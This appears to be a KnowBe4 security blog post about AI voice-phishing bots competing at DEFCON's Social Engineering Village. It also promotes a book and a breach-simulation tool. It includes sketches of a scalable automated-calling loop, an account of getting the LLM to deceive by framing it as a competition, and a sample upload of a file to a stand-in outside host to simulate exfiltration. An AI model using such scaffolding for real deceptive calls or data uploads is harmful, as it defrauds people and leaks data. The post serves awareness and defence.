[PROVED] Unsuspecting Call Recipients Are Super Vulnerable to AI Vishing



Heads-up: I just proved that unsuspecting call recipients are super vulnerable to AI vishing

So, this is pretty exciting… and terrifying. If you attended my “Reality Hijacked” webinar back in May, you saw me do a quick demonstration of a couple of AI-powered vishing bots that I’d been working on.

That experiment got its first real “live fire” test this past Saturday at the DEFCON Social Engineering Village capture-the-flag (CTF) competition. In fact, the village created an inaugural event, the “John Henry Competition,” just for this experiment. The goal was to put the AI to the test and answer the question: can an AI-powered voice phishing bot really perform at the level of an experienced social engineer?

The answer: DEFINITELY.

The AI's performance in its debut was impressive. The bots engaged in banter, made jokes, and improvised to keep their targets engaged. By the end of the allotted 22 minutes, the AI-driven system had captured 17 objectives; the human team gathered 12 in their own 22-minute window.

But here’s where it gets interesting. Everyone in the room naturally assumed the bots had won – even the other contestants. The bots were picking up flags fast, and they clearly captured more of them. Yet even though our AI bots gathered more flags, the human team won – by a hair (1,500 points vs. 1,450). It was one of those results that shocked everyone.

What clinched it for the human team was an amazing pretext that let them secure higher point-value flags at the very beginning of the call rather than building up to those higher-value objectives.

But now think about it. The difference wasn’t that the targets trusted the humans more. It wasn’t that they somehow suspected that the AI was an AI. It came down to strategy and pretext… something that can be incorporated into the LLM’s prompt. And that’s where things get real.

Here are a few points of interest:

  • The entire backend was constructed from commercially available, off-the-shelf SaaS products, each costing between $0 and $20 per month. This ushers in a new era in which weapons-grade deception capabilities are within reach of virtually anyone with an internet connection.
  • The LLM prompting method we employed for the vishing bots didn't require any 'jailbreaking' or complex manipulation. It was remarkably straightforward. In fact, I explicitly told it in the prompt that it was competing in the DEFCON 32 Social Engineering Village vishing competition.
  • The prompt engineering involved was not all that complex. Each prompt was about 1,500 words, written in a very straightforward manner (see the sketch after this list).
  • Each component, taken on its own, operated within what would be considered allowable and ‘safe’ parameters. It is the way they can be integrated together – each without the other knowing – that makes the combination weaponizable.
  • None of the targets who received calls from the bots acted with any hesitancy. They treated the voice on the other end of the phone as if it were any other human caller.
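
For the technically curious, here is a rough sketch of the pattern those pieces form. Everything in it is an illustrative stand-in of my choosing – the library, the model name, and the prompt text are assumptions, not the actual competition stack: any hosted speech-to-text service feeds a plainly prompted LLM, whose replies feed any text-to-speech service and go back down the phone line.

```python
# Minimal conceptual sketch of an off-the-shelf voice-agent loop.
# Library, model name, and prompt text are illustrative assumptions,
# NOT the actual stack used at the competition.
from openai import OpenAI  # assumes any OpenAI-compatible chat API

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Per the post: no jailbreak needed, just a plain ~1,500-word system
# prompt carrying the persona, the pretext, and the strategy.
SYSTEM_PROMPT = "You are a contestant in a consented vishing competition..."

history = [{"role": "system", "content": SYSTEM_PROMPT}]

def agent_turn(caller_text: str) -> str:
    """One conversational turn: transcribed caller audio in, reply text out."""
    history.append({"role": "user", "content": caller_text})
    resp = client.chat.completions.create(model="gpt-4o", messages=history)
    reply = resp.choices[0].message.content
    history.append({"role": "assistant", "content": reply})
    return reply  # hand the reply to any TTS service, then to the phone line
```

The point is how little there is to it: swap the system prompt – the strategy and pretext – and the same loop becomes a different “caller.”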

We’re facing a raw truth

AI-driven deception can operate at an unprecedented scale, potentially engaging thousands of targets simultaneously. These digital deceivers never fatigue, never nervously stumble, and can work around the clock without breaks. The consistency and scalability of this technology present a paradigm shift in the realm of social engineering.
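
To make that scale point concrete, here is a toy sketch. It is hypothetical throughout – the `place_call` stub stands in for a real telephony session and does nothing – but it shows that fanning one scripted agent out across thousands of simultaneous conversations is just a few lines of orchestration.

```python
# Illustrative sketch of the scale argument: one process, one operator,
# thousands of concurrent "callers." place_call() is a hypothetical stub.
import asyncio

MAX_CONCURRENT = 1000  # in practice bounded by API rate limits and phone lines

async def place_call(number: str) -> None:
    # Stand-in for a real dial-out + STT -> LLM -> TTS loop;
    # here it just simulates a three-minute call.
    await asyncio.sleep(180)

async def run_call(number: str, sem: asyncio.Semaphore) -> None:
    async with sem:  # never fatigues, never stumbles, runs around the clock
        await place_call(number)

async def campaign(targets: list[str]) -> None:
    sem = asyncio.Semaphore(MAX_CONCURRENT)
    await asyncio.gather(*(run_call(t, sem) for t in targets))

# asyncio.run(campaign(target_list))  # thousands of targets, simultaneously
```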

Perhaps most unsettling was the AI's ability to pass as human. The individuals on the receiving end of these calls had no inkling they were interacting with a machine. Our digital creation passed the Turing test in a real-world, high-stakes environment, blurring the line between human and AI interaction to an unprecedented degree.

My Conversations with a GenAI-Powered Virtual Kidnapper

The following day, I gave a talk at the AI Village titled "My Conversations with a GenAI-Powered Virtual Kidnapper." The session was standing room only, with attendees spilling over into the next village, underscoring the intense interest in this topic.

During this talk, I demonstrated a much darker, fully jailbroken bot capable of simulating a virtual kidnapping scenario (this is also previewed in my “Reality Hijacked” webinar). I also discussed some of the interesting quirks and ways that I interacted with the bot while testing its boundaries. The implications of this more sinister application of AI technology are profound and warrant their own discussion in a future post.

Since the demonstration and talk, I've been encouraged by the number of companies and vendors reaching out to learn more about the methods and vulnerabilities that enabled the scenarios I showcased. These conversations promise to be fruitful as we collectively work to understand and mitigate the risks posed by AI-driven deception.

This competition serves as a wake-up call

So, here’s where we are: This competition and the subsequent demonstrations serve as a wake-up call. We're not just theorizing about potential future threats; we're actively witnessing the dawn of a new era in digital deception. The question now isn't if AI can convincingly impersonate humans, but how we as a society will adapt to this new reality.

If you’re interested in topics like these and want to know what you can do to protect yourself, your organization, and your family, then consider checking out my new book, "FAIK: A Practical Guide to Living in a World of Deepfakes, Disinformation, and AI-Generated Deceptions." The book offers strategies for identifying AI trickery and maintaining personal autonomy in an increasingly AI-driven world. It's designed to equip readers with the knowledge and tools necessary to navigate this new digital landscape. (Available October 1st, with pre-orders open now.)


Free BreachSim Tool

How easy is it for bad actors to penetrate your systems and exfiltrate your data? Pinpoint vulnerabilities, take action, and build stronger cyber defenses with KnowBe4’s Breach Simulator, “BreachSim.” Based on techniques outlined in the MITRE ATT&CK framework, BreachSim launches 12+ simulated scenarios to uncover the stark reality of what happens when employees unknowingly fall for an attack.

How BreachSim works:

  • 100% harmless simulation of real breach and data exfiltration attacks
  • Provides secure .txt, .doc, and .bmp test files for the simulation
  • Tests 12+ realistic data exfiltration scenarios following the MITRE ATT&CK framework (a generic sketch of the pattern follows this list)
  • Just download the installer, upload the secure test files, and run
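
For a sense of what such a test does under the hood, here is a generic, heavily simplified sketch. To be clear, this is my illustration, not BreachSim’s actual code; the endpoint and file name are invented. It shows the basic question these simulations ask: can a harmless marker file leave the network over an ordinary web channel (cf. MITRE ATT&CK T1567, Exfiltration Over Web Service)?

```python
# Generic illustration only -- NOT BreachSim's actual implementation.
# Endpoint and file name are invented for the example.
import urllib.request
from pathlib import Path

TEST_FILE = Path("simulated_secret.txt")   # harmless marker, no real data
COLLECTOR = "https://example.com/upload"   # hypothetical collection endpoint

def simulate_exfil() -> int:
    """Attempt a benign upload; being blocked means the egress control works."""
    TEST_FILE.write_text("TEST MARKER - no sensitive content")
    req = urllib.request.Request(
        COLLECTOR, data=TEST_FILE.read_bytes(), method="POST"
    )
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req) as resp:
        return resp.status  # a 2xx here means the exfiltration path is open
```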

Results in a few minutes!

Try Now

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

https://www.knowbe4.com/free-tools/breach-simulator


